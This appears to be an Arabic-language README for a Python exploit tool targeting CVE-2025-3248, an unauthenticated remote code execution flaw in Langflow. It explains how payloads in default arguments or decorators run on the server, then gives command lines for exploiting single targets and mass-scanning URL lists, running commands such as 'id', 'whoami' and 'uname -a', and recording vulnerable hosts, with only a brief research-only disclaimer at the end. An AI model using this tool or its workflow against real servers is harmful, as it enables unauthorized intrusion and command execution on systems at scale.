
Langflow، عند تحليل "رمز التحقق" المُقدَّم من المستخدم عبر AST وتجميعه، يستدعي دالتي Python `compile()`/`exec()` دون إجراء مصادقة أو فرض قيود صندوق الحماية (كما يتم تقييم الوسائط الافتراضية للدوال والمُزيِّنات أثناء مرحلة التجميع)، مما يسمح للمهاجم بوضع حمولة خبيثة في القيم الافتراضية للوسائط أو في المُزيِّنات، وبالتالي تنفيذ تعليمات برمجية عشوائية في سياق الخادم (مثل فتح قشرة عكسية، تنزيل ملفات، أو التحرك الجانبي).
أداة Python لفحص واستغلال ثغرة CVE-2025-3248، والتي تسمح بتنفيذ الأوامر عن بُعد (RCE) في تطبيقات Langflow.
pip install requests
python cve-2025-3248.py http://target:port
python cve-2025-3248.py http://target:port -c "id"
python cve-2025-3248.py -f urls.txt
python cve-2025-3248.py -f urls.txt -c "whoami"
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v
url: عنوان URL الهدف (مثال: http://10.10.10.1:7860)-f, --file: ملف يحتوي على قائمة عناوين URL، عنوان واحد في كل سطر-c, --cmd: الأمر المراد تنفيذه (مثال: id, whoami)--timeout: مهلة الطلب، الافتراضي 10 ثوانٍ-t, --threads: عدد الخيوط للفحص الجماعي، الافتراضي 10-v, --verbose: الوضع التفصيلي، يعرض الاستجابة الخامpython cve-2025-3248.py http://192.168.1.100:7860
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"
أنشئ ملف targets.txt:
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860
ثم شغّل:
python cve-2025-3248.py -f targets.txt
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5
[+] تنفيذ ناجح[-] فشل أو خطأ[!] رسالة تحذير[*] مخرجات معلوماتيةيتم حفظ الأهداف التي تم فحصها بنجاح في ملف vulnerable_targets.txt أو vulnerable_targets_{command}.txt.
هذه الأداة مخصصة لأغراض البحث الأمني والتعليم فقط. يتحمل المستخدم مسؤولية استخدامه. قد يؤدي اختبار الأنظمة دون إذن إلى انتهاك القوانين واللوائح.